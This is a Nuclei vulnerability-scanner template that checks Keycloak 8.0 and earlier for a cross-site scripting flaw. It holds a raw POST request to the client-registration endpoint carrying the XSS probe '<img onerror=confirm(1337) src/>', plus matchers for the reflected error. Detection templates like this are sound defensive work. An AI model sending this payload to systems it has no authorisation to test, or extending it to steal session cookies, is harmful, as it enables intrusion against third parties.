nuclei-templates/vulnerabilities/other/keycloak-xss.yaml

36 lines
975 B
YAML

id: keycloak-xss
info:
name: Keycloak <= 8.0 - Cross-Site Scripting
author: incogbyte
severity: info
description: Keycloak 8.0 and prior contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
reference:
- https://cure53.de/pentest-report_keycloak.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: keycloak,xss
requests:
- raw:
- |
POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"<img onerror=confirm(1337) src/>":1}
matchers-condition: and
matchers:
- type: status
status:
- 400
- type: word
words:
- 'Unrecognized field "<img onerror=confirm(1337) src/>"'
# Enhanced by mp on 2022/09/23